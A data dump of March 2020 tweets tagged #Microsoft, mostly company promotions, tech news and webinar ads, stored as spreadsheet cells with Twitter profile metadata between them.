    <t>{'id': 1121381643694948353, 'id_str': '1121381643694948353', 'name': '10bITs', 'screen_name': '10bITsofficial', 'location': 'Irving, Texas', 'description': "10bITs is an IT company where we connect technology and people. People who believe in transforming today's technology for the betterment of tomorrow.", 'url': 'https://t.co/GHvkoj34aj', 'entities': {'url': {'urls': [{'url': 'https://t.co/GHvkoj34aj', 'expanded_url': 'https://www.10bits.com/', 'display_url': '10bits.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 245, 'friends_count': 683, 'listed_count': 0, 'created_at': 'Thu Apr 25 11:53:12 +0000 2019', 'favourites_count': 122, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 704,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'http://pbs.twimg.com/profile_images/1121401018774777859/cqekMflN_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1121401018774777859/cqekMflN_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1121381643694948353/1563184888',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</si>
  <si>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16:35:30 +0000 2020</t>
  </si>
  <si>
    <t>Check out some of our champions featured in this #Microsoft promotional video! 
https://t.co/B1C124DoQO
#IT #tech #stem #cte https://t.co/6R2xmTIyH4</t>
  </si>
  <si>
    <t>{'id': 730848642, 'id_str': '730848642', 'name': 'LAYC Career Academy', 'screen_name': 'LAYCCAPCS', 'location': 'Washington, D.C.', 'description': 'Providing DC youth ages 16-24 with free college credits, free IT/Medical Assistant training and GED/College/Career prep. APPLY TODAY!! A+ Certification, NET+', 'url': 'https://t.co/a5m6yinoSH', 'entities': {'url': {'urls': [{'url': 'https://t.co/a5m6yinoSH', 'expanded_url': 'https://laycca.org/apply/', 'display_url': 'laycca.org/apply/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 451, 'friends_count': 83, 'listed_count': 8, 'created_at': 'Wed Aug 01 15:06:22 +0000 2012', 'favourites_count': 117, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1331,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'http://pbs.twimg.com/profile_images/1160887621528236032/vnn19oAV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1160887621528236032/vnn19oAV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/730848642/1565614381',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</si>
  <si>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16:35:05 +0000 2020</t>
  </si>
  <si>
    <t>Whats New for #Microsoft 2020 Partner of the Year Awards https://t.co/R9elIdsdxh</t>
  </si>
  <si>
    <t>Mon Mar 02 16:34:33 +0000 2020</t>
  </si>
  <si>
    <t>Can your webcam be hacked? 
#computer #windows10 #microsoft #virus #cybersecurity #hacked #malware #phishing #security #hacking #cyberattack #informationsecurity #cybercrime
https://t.co/Ho9Ig2yAXs https://t.co/ekRgxjkkcD</t>
  </si>
  <si>
    <t>{'id': 3053008495, 'id_str': '3053008495', 'name': 'A Better Tech, LLC', 'screen_name': 'BetterTechLLC', 'location': 'Spring, TX', 'description': 'Personal Computer Sales &amp; Service', 'url': 'http://t.co/yYLeKvxSQE', 'entities': {'url': {'urls': [{'url': 'http://t.co/yYLeKvxSQE', 'expanded_url': 'http://bettercomputertech.com', 'display_url': 'bettercomputertech.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 90, 'friends_count': 315, 'listed_count': 0, 'created_at': 'Sun Mar 01 16:27:15 +0000 2015', 'favourites_count': 13, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 182,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'http://pbs.twimg.com/profile_images/572071377260126208/6oBdmR0W_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/572071377260126208/6oBdmR0W_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3053008495/1425228345',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</si>
  <si>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16:34:03 +0000 2020</t>
  </si>
  <si>
    <t>Great Monday reading from @benedictevans on monopolies...
'The tech industry loves to talk about 'moats' around a business...but there are several ways a moat can stop working.'
https://t.co/2OdavHMalp
#Monopoly #IBM #Microsoft</t>
  </si>
  <si>
    <t>{'id': 922794323233603584, 'id_str': '922794323233603584', 'name': 'Tangem', 'screen_name': 'Tangem', 'location': 'Zug, Switzerland', 'description': 'Highly secure chip technology to enable physical representation of blockchain assets.\nCrypto wallet shop: https://t.co/ygohCtlE2k', 'url': 'https://t.co/e5Fdr86aBf', 'entities': {'url': {'urls': [{'url': 'https://t.co/e5Fdr86aBf', 'expanded_url': 'https://tangem.com', 'display_url': 'tangem.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/ygohCtlE2k', 'expanded_url': 'http://tangemcards.com', 'display_url': 'tangemcards.com', 'indices': [106, 129]}]}}, 'protected': False, 'followers_count': 1788, 'friends_count': 299, 'listed_count': 34, 'created_at': 'Tue Oct 24 11:58:06 +0000 2017', 'favourites_count': 952, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 271,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'http://pbs.twimg.com/profile_images/959226565274976256/dn0CFxP5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/959226565274976256/dn0CFxP5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/922794323233603584/1525422573',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</si>
  <si>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16:34:00 +0000 2020</t>
  </si>
  <si>
    <t>There's still time to register for this week's webinar, Jump into #AzureCloud. Join Edenhouse &amp;amp; #Microsoft to unlock the business benefits of operating in the cloud &amp;amp; understand why Azure is the best option to host #SAP workloads. 
https://t.co/CnfCgKCVYi
#DigitalTransformation https://t.co/Cej3hguvBV</t>
  </si>
  <si>
    <t>{'id': 317318925, 'id_str': '317318925', 'name': 'Edenhouse Solutions', 'screen_name': 'EdenhouseUK', 'location': 'England, United Kingdom', 'description': 'The SAP people who make SAP make sense.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1400, 'friends_count': 358, 'listed_count': 101, 'created_at': 'Tue Jun 14 19:17:03 +0000 2011', 'favourites_count': 804, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2082,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'http://pbs.twimg.com/profile_images/1021337135352373248/KS_RQHn6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1021337135352373248/KS_RQHn6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/317318925/1560765312', 'profile_link_color': 'ABB8C2',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</si>
  <si>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Mon Mar 02 16:31:03 +0000 2020</t>
  </si>
  <si>
    <t>#cybersecurity #infosec #microsoft     How do you know if your company is secure or at risk of becoming a #cybercrime victim? Take this 10-question quiz to find out. https://t.co/wyi1L8RLx7</t>
  </si>
  <si>
    <t>Mon Mar 02 16:30:58 +0000 2020</t>
  </si>
  <si>
    <t>#TechNews
Microsofts new Office app arrives on iOS and Android with mobile-friendly features
Read the full story here:
https://t.co/xRpmQINmqZ
Source: https://t.co/4wjrn6nr8o
#technology #theverge #Microsoft #OfficeApp #Android #iOS #mobileapp #Word #Excel #PowerPoint https://t.co/ozuPqHfYEy</t>
  </si>
  <si>
    <t>Mon Mar 02 16:30:24 +0000 2020</t>
  </si>
  <si>
    <t>Listen to our PowerBI Guru, Jay Fitzhenry, discuss the technology behind PowerBi and the benefits it can bring to businesses small and large. 
https://t.co/lHKlJztuVF 
#powerbi #powerapps #powerautomate #powerplatform #technology #microsoft https://t.co/w8dOQaHmUR</t>
  </si>
  <si>
    <t>Mon Mar 02 16:30:16 +0000 2020</t>
  </si>
  <si>
    <t>#Microsofts Surface Duo is reportedly launching months earlier than expected https://t.co/mA5BeCCrwu #TechJunkieNews https://t.co/85079hIKqy</t>
  </si>
  <si>
    <t>Mon Mar 02 16:30:13 +0000 2020</t>
  </si>
  <si>
    <t>#cybersecurity #infosec #microsoft     Nervous about phishing attacks? #Microsoft365 has the ability to detect and detonate malicious links before they ever reach your inbox. https://t.co/YZ4S1B7GRs</t>
  </si>
  <si>
    <t>Mon Mar 02 16:30:04 +0000 2020</t>
  </si>
  <si>
    <t>Get Free Windows VPS with Remote Desktop Connection (RDC) in India
See: https://t.co/jaOx948D5X
@isrgrajan #MondayMotivation #IsrgRajan #amazon #AWS #Microsoft #VPS #Windows https://t.co/d1MyYVPDn5</t>
  </si>
  <si>
    <t>{'id': 84330425, 'id_str': '84330425', 'name': 'Isrg Rajan', 'screen_name': 'isrgrajan', 'location': 'New Delhi - India', 'description': 'Entrepreneur, columnist and Founder of Isrg KBâ€” https://t.co/z1f0suDGwx', 'url': 'https://t.co/ZfoYtoq7Lc', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZfoYtoq7Lc', 'expanded_url': 'http://isrg.me', 'display_url': 'isrg.me', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/z1f0suDGwx', 'expanded_url': 'http://isrgrajan.com', 'display_url': 'isrgrajan.com', 'indices': [48, 71]}]}}, 'protected': False, 'followers_count': 3300, 'friends_count': 83, 'listed_count': 43, 'created_at': 'Thu Oct 22 13:55:54 +0000 2009', 'favourites_count': 444, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 26178,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'http://pbs.twimg.com/profile_images/1190988064765743106/FJrzpCN1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1190988064765743106/FJrzpCN1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/84330425/1572788629', 'profile_link_color': 'FAFAFA',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</si>
  <si>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16:28:49 +0000 2020</t>
  </si>
  <si>
    <t>A legend passes on. You will be missed. RIP.  
#konami #gamer #cheatcode
 #gamermemes #gaming #games #gamerlife #ps4 #xbox1 #gamingcommunity #youtube #mixer #mixerstreamer #twitch #oldmangamer38 #sony #microsoft... https://t.co/9QYtzJlyDL</t>
  </si>
  <si>
    <t>{'id': 754524306, 'id_str': '754524306', 'name': 'ðŸŽ® Oldmangamer38 ðŸŽ®', 'screen_name': 'Oldmangamer38', 'location': 'GA', 'description': 'Born in Houston, TX. ðŸ¤˜ðŸŽ® \nSponsored PT streamer\nFollow me on Instagram, FB, Mixer\nSupport Our Stream \nCashapp: $oldmangamer38', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 71, 'friends_count': 186, 'listed_count': 1, 'created_at': 'Mon Aug 13 05:51:49 +0000 2012', 'favourites_count': 1152, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1782, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '352726', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1188847960211251202/XYNNkWIV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1188847960211251202/XYNNkWIV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/754524306/1560189199', 'profile_link_color': '2C3FCF',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</si>
  <si>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16:28:00 +0000 2020</t>
  </si>
  <si>
    <t>The #SPECworkstation 3.0.4 #benchmark supports #Microsoft processor groups for testing #multicore #scaling beyond 64 logical #processors. Download as a patch to V3.0.3 or as a full, standalone benchmark. https://t.co/iCB2zi9QZN https://t.co/CNJTXobOm6</t>
  </si>
  <si>
    <t>{'id': 2372454943, 'id_str': '2372454943', 'name': 'SPEC', 'screen_name': 'spec_perf', 'location': 'Gainesville, VA, USA', 'description': 'Standard Performance Evaluation Corp. develops benchmarks and tools for evaluating performance and energy use for the latest generation of computing systems.', 'url': 'http://t.co/XbeIl0UGPs', 'entities': {'url': {'urls': [{'url': 'http://t.co/XbeIl0UGPs', 'expanded_url': 'http://www.spec.org', 'display_url': 'spec.org', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 436, 'friends_count': 97, 'listed_count': 30, 'created_at': 'Tue Mar 04 21:27:39 +0000 2014', 'favourites_count': 37, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 792,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'http://pbs.twimg.com/profile_images/440964498443104256/8Eknvty1_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/440964498443104256/8Eknvty1_normal.jpeg',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</si>
  <si>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16:27:19 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #SharePoint has become one of the worlds most popular tools for creating websites. However, it needs to be monitored closely. Take a look at Comparitech's list of the top 7 SharePoint administrator tools for 2020 to help you get the job done! https://t.co/CBZvyEUflB</t>
  </si>
  <si>
    <t>{'id': 33463144, 'id_str': '33463144', 'name': 'eG Innovations', 'screen_name': 'eGInnovations', 'location': 'United States', 'description': 'End-to-end performance assurance for enterprise IT â€“ from application code to customer experience, from data center to cloud.', 'url': 'https://t.co/q2XvmFZV5f', 'entities': {'url': {'urls': [{'url': 'https://t.co/q2XvmFZV5f', 'expanded_url': 'https://www.eginnovations.com/', 'display_url': 'eginnovations.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 978, 'friends_count': 1559, 'listed_count': 58, 'created_at': 'Mon Apr 20 08:39:25 +0000 2009', 'favourites_count': 331, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2376, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '474747', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/992457476074192896/IJ-nr9Fa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/992457476074192896/IJ-nr9Fa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/33463144/1547107628', 'profile_link_color': '1B95E0',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</si>
  <si>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Mon Mar 02 16:24:19 +0000 2020</t>
  </si>
  <si>
    <t>TLDR; Microsoft is sending yet another big fat  to IT teams that use its on-premise software and sever systems.
#microsoft #mcse #mcsa #windows
https://t.co/2ndBmYipFX</t>
  </si>
  <si>
    <t>{'id': 3847285643, 'id_str': '3847285643', 'name': 'Michael Firth', 'screen_name': 'TechFirth', 'location': 'Hertfordshire, United Kingdom', 'description': 'tech â€¢ travel â€¢ photography â€¢ apple â€¢ space â€¢ politics â€¢ veggie', 'url': 'https://t.co/EAHfsT0feT', 'entities': {'url': {'urls': [{'url': 'https://t.co/EAHfsT0feT', 'expanded_url': 'http://about.me/michaelfirth', 'display_url': 'about.me/michaelfirth', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 180, 'friends_count': 360, 'listed_count': 55, 'created_at': 'Fri Oct 02 23:39:56 +0000 2015', 'favourites_count': 553, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6159,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'http://pbs.twimg.com/profile_images/1207720710707302400/ZobYi_6r_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1207720710707302400/ZobYi_6r_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3847285643/1581810580', 'profile_link_color': 'C62104',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</si>
  <si>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16:21:28 +0000 2020</t>
  </si>
  <si>
    <t>How should you connect with employees to boost engagement and company culture? 
https://t.co/BNhgk1eqgl
#ProfLaskin #engagement #Microsoft</t>
  </si>
  <si>
    <t>{'id': 775513789873750017, 'id_str': '775513789873750017', 'name': 'Christian Casagranda', 'screen_name': 'Christian4Casa', 'location': 'Hamden, CT', 'description': "Brooklyn NY- Hamden CT  \nPublic Relations Major, Journalism Minor Quinnipiac University '19 \nQuinnipiac Men's Soccer Team #8 #Quinnipiac #QuinnipiacAthletics", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 45, 'friends_count': 147, 'listed_count': 0, 'created_at': 'Tue Sep 13 01:57:50 +0000 2016', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/775518069250674688/aUblK4DJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/775518069250674688/aUblK4DJ_normal.jpg',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</si>
  <si>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16:20:03 +0000 2020</t>
  </si>
  <si>
    <t>The dual-screen #Microsoft Surface Duo could be launching earlier than expected https://t.co/hVs22q1r6a</t>
  </si>
  <si>
    <t>{'id': 2459374855, 'id_str': '2459374855', 'name': 'Myriad Digital', 'screen_name': 'Myriad_Digital', 'location': 'Newton Abbot, England', 'description': 'Providing IT support, VOIP services &amp; cloud solutions to businesses &amp; charities in South #Devon, helping you get the most from technology. Call 01626 360011.', 'url': 'https://t.co/Hg6nlG8jBN', 'entities': {'url': {'urls': [{'url': 'https://t.co/Hg6nlG8jBN', 'expanded_url': 'http://www.mdgp.co.uk/', 'display_url': 'mdgp.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2049, 'friends_count': 1053, 'listed_count': 57, 'created_at': 'Wed Apr 23 07:44:11 +0000 2014', 'favourites_count': 54, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10442, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '080808', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1024598370525044736/AgpDKzYy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1024598370525044736/AgpDKzYy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2459374855/1533118677', 'profile_link_color': '080808',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</si>
  <si>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16:19:11 +0000 2020</t>
  </si>
  <si>
    <t>Are you utilizing your #videoconferencing systems to have affecting meetings? Learn how one-button meeting solutions can increase usability &amp;amp; practicality. #Cisco #Microsoft  https://t.co/mzZHJaPwJM https://t.co/qc1F9CVor3</t>
  </si>
  <si>
    <t>{'id': 861650002548011010, 'id_str': '861650002548011010', 'name': 'Jordan Cooper', 'screen_name': 'CarouselCoop', 'location': 'United States', 'description': 'In world of data, technology, &amp; everything in between. Using my powers for good. Account Exec @ @Carousel_Ind.', 'url': 'https://t.co/k2GMOlsAgT', 'entities': {'url': {'urls': [{'url': 'https://t.co/k2GMOlsAgT', 'expanded_url': 'https://www.linkedin.com/in/jordanmaxcooper/', 'display_url': 'linkedin.com/in/jordanmaxcoâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 36, 'friends_count': 115, 'listed_count': 0, 'created_at': 'Mon May 08 18:32:24 +0000 2017', 'favourites_count': 78, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 644,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'http://pbs.twimg.com/profile_images/861658521707962372/1XNaAD_r_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/861658521707962372/1XNaAD_r_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/861650002548011010/1494270365',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</si>
  <si>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16:17:58 +0000 2020</t>
  </si>
  <si>
    <t>Do you know what you need to do in preparation for the financial year-end closing in #Microsoft #DynamicsGP? With year-end approaching well be discussing the best practices on how to close the year, beginning with how to prepare your #Inventory records.
https://t.co/IkR3YPPNDn</t>
  </si>
  <si>
    <t>{'id': 355060851, 'id_str': '355060851', 'name': 'm-hance', 'screen_name': 'm_hanceSoftware', 'location': 'United Kingdom', 'description': 'A Microsoft Dynamics Gold Partner and leading provider of Microsoft Dynamics 365, Microsoft Dynamics 365 Business Central, Microsoft Dynamics GP &amp; Office 365.', 'url': 'http://t.co/guZWrtdZyC', 'entities': {'url': {'urls': [{'url': 'http://t.co/guZWrtdZyC', 'expanded_url': 'http://www.m-hance.com', 'display_url': 'm-hance.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2302, 'friends_count': 1799, 'listed_count': 275, 'created_at': 'Sun Aug 14 19:22:54 +0000 2011', 'favourites_count': 504, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7922, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '58C6E8', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/785851717611057154/K1uzWwqI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/785851717611057154/K1uzWwqI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/355060851/1566554201', 'profile_link_color': '2C8491',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</si>
  <si>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Mon Mar 02 16:16:35 +0000 2020</t>
  </si>
  <si>
    <t>One of the major benefits of #UCaaS is its speed to market in rolling out new features.  #Microsoft #Teams has rolled out some long over due features that we need. Check them out below! https://t.co/vAlR585ik5 https://t.co/QAmxTPclsE</t>
  </si>
  <si>
    <t>Mon Mar 02 16:16:21 +0000 2020</t>
  </si>
  <si>
    <t>What to do next.... oh wait its all nicely ordered by date and priority in planner. Id be lost without you! #planner #microsoft #todo #organised #team #aligned #arrows</t>
  </si>
  <si>
    <t>{'id': 105576850, 'id_str': '105576850', 'name': 'Bravax', 'screen_name': 'Bravax', 'location': 'London', 'description': 'Co-founder/COO of Simplify Change. #integrator #changemanagement #coo #followyourdreams', 'url': 'https://t.co/OYuPksdowN', 'entities': {'url': {'urls': [{'url': 'https://t.co/OYuPksdowN', 'expanded_url': 'https://linkedin.com/in/zaynblore/', 'display_url': 'linkedin.com/in/zaynblore/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 61, 'friends_count': 262, 'listed_count': 9, 'created_at': 'Sat Jan 16 20:01:01 +0000 2010', 'favourites_count': 32, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 414,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'http://pbs.twimg.com/profile_images/1198577415372574720/5utVecVe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1198577415372574720/5utVecVe_normal.jpg',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</si>
  <si>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16:15:59 +0000 2020</t>
  </si>
  <si>
    <t>Why can't Indian #IT champions create their own "twitter" ? #Google #Microsoft etc have people of Indian origin.  I hope they owe something to #IIT.   Isn't it ? #Goa #NirbhayaCase #ViratKohli #pmtweets #COVID #NirbhayaCase</t>
  </si>
  <si>
    <t>{'id': 297962045, 'id_str': '297962045', 'name': 'Vikant Sahay ðŸ‡®ðŸ‡³', 'screen_name': 'vikantsahay', 'location': 'Panaji, Goa', 'description': 'Journalist in #Goa. Ex-TOI,HT,TV18,FE,BBC. 8yrs as Sr.Pol.Advisor #USConsulate ;3yrs Head CorpComm #TataSteel, #IVLP fellow #IndiaFirst #MyIndia Tweets personal', 'url': 'https://t.co/iVrFBT3A7H', 'entities': {'url': {'urls': [{'url': 'https://t.co/iVrFBT3A7H', 'expanded_url': 'https://youtu.be/ZBPYYiYp8sQ', 'display_url': 'youtu.be/ZBPYYiYp8sQ', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1928, 'friends_count': 423, 'listed_count': 80, 'created_at': 'Fri May 13 12:33:59 +0000 2011', 'favourites_count': 8783, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11608,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'http://pbs.twimg.com/profile_images/1194211662536019968/0Xe2TaSw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1194211662536019968/0Xe2TaSw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/297962045/1408066880',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</si>
  <si>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16:15:08 +0000 2020</t>
  </si>
  <si>
    <t>Leaked video reveals new Surface Duo peek feature https://t.co/nxF4uENnJG via @verge 
#smartphones #tech #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 16:15:00 +0000 2020</t>
  </si>
  <si>
    <t>Protect yourself from tech support scams - #Windows #Microsoft #TechSupport https://t.co/9bKKbfbqrl</t>
  </si>
  <si>
    <t>{'id': 1015727168, 'id_str': '1015727168', 'name': 'Antti K. Koskela', 'screen_name': 'koskila', 'location': 'Tampere Region, Finland', 'description': 'Solution Architect ðŸ‘¨\u200dðŸ’» @valointranet (#Office365 #Azure). Microsoft #OfficeDev MVP. Ex-expat (ðŸ¦…+ðŸ), now a hermit @ Finnish countryside ðŸ¤·\u200dâ™‚ï¸ #remotework', 'url': 'https://t.co/0PCLEzybjv', 'entities': {'url': {'urls': [{'url': 'https://t.co/0PCLEzybjv', 'expanded_url': 'https://www.koskila.net', 'display_url': 'koskila.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2722, 'friends_count': 2164, 'listed_count': 88, 'created_at': 'Sun Dec 16 17:48:45 +0000 2012', 'favourites_count': 35544, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10849,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'http://pbs.twimg.com/profile_images/1119287883226124296/QIxVQUwI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1119287883226124296/QIxVQUwI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1015727168/1525637086',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</si>
  <si>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16:14:47 +0000 2020</t>
  </si>
  <si>
    <t>#Amazon, #Microsoft, and #IBM are under pressure to follow #Google and drop gender labels like 'man' and 'woman' from their #AI - @businessinsider https://t.co/4Da7OepeSB</t>
  </si>
  <si>
    <t>Mon Mar 02 16:13:32 +0000 2020</t>
  </si>
  <si>
    <t>2020 #Microsoft Imagine Cup Asia Finals: Indian team makes it to top 3 https://t.co/44nbG35iOo</t>
  </si>
  <si>
    <t>Mon Mar 02 16:13:05 +0000 2020</t>
  </si>
  <si>
    <t>@Oracle is upping its game in the race against #Microsoft and #Amazon for #cloud computing market share. @Reuters #cdwsocial https://t.co/e7xQhNVyRg</t>
  </si>
  <si>
    <t>{'id': 84628167, 'id_str': '84628167', 'name': 'Gabriel Adler', 'screen_name': 'GabrielAdler', 'location': 'Chicago, IL', 'description': '15yr pro in IT industry.  Proud husband/father.  Lover of sports.  Enthusiastic softball/soccer coach! @WindyCityRage Part time gardener/chef!  Opinions mine!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 170, 'friends_count': 922, 'listed_count': 5, 'created_at': 'Fri Oct 23 16:16:53 +0000 2009', 'favourites_count': 984, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3231,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'http://pbs.twimg.com/profile_images/1160947033437614080/lwcIPmqF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1160947033437614080/lwcIPmqF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/84628167/1566843986',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</si>
  <si>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16:10:22 +0000 2020</t>
  </si>
  <si>
    <t>Hey I just dripped a new gameplay video,  forza horizon 4
#Microsoft #XboxGamePass
#XboxGamePassUltimate #steam #steamcontroller #Gameplay
#Audi #uk 
https://t.co/pXOzS7M41l</t>
  </si>
  <si>
    <t>Mon Mar 02 16:06:36 +0000 2020</t>
  </si>
  <si>
    <t>Register for the webinar:  https://t.co/Aj0WouScDt 
Renaud Montes and Microsoft MVP Christian Buckley speak about using big data to predict customer loyalty and managing tasks end to end in Microsoft 365 ecosystem. 
#zen3 #microsoft #customerengagement #microsoftoffice365 https://t.co/HzGyh4TMyb</t>
  </si>
  <si>
    <t>In his latest post, #Microsoft #Architect, Mark Arnold gives us An #Office #365 fable. One of a company spin-off and a mission: Get these 100 users off our Office 365, but they  need access to all those terabytes of project files and design drawings."  https://t.co/8j5Rav6CbY</t>
  </si>
  <si>
    <t>Mon Mar 02 16:06:11 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft operates one of the largest global networks. We are democratizing connectivity with ExpressRoute Global Reach, allowing customers to build their own virtual global backbone! https://t.co/t1bWqAP0vv</t>
  </si>
  <si>
    <t>Mon Mar 02 16:05:57 +0000 2020</t>
  </si>
  <si>
    <t>One month away from the biggest and best #Microsoft #Teams event in New England! Join us on Thursday, April 2nd at the Microsoft Technology Center in Burlington, MA - it's free to register so secure your spot today! https://t.co/W7GhTeakQQ #teamsthursday @TeamsThursdayNE https://t.co/vEArI2NL6u</t>
  </si>
  <si>
    <t>{'id': 1070751681800007685, 'id_str': '1070751681800007685', 'name': 'Spyglass MTG', 'screen_name': 'SpyglassMTG', 'location': 'Lincoln, RI', 'description': 'Innovating cloud, collaboration and analytics', 'url': 'https://t.co/cqZPnikhtm', 'entities': {'url': {'urls': [{'url': 'https://t.co/cqZPnikhtm', 'expanded_url': 'http://www.spyglassmtg.com', 'display_url': 'spyglassmtg.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 29, 'friends_count': 27, 'listed_count': 0, 'created_at': 'Thu Dec 06 18:47:49 +0000 2018', 'favourites_count': 280, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 217, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1171458424212578307/OmqyJ4Fa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1171458424212578307/OmqyJ4Fa_normal.jpg', 'profile_banner_url': 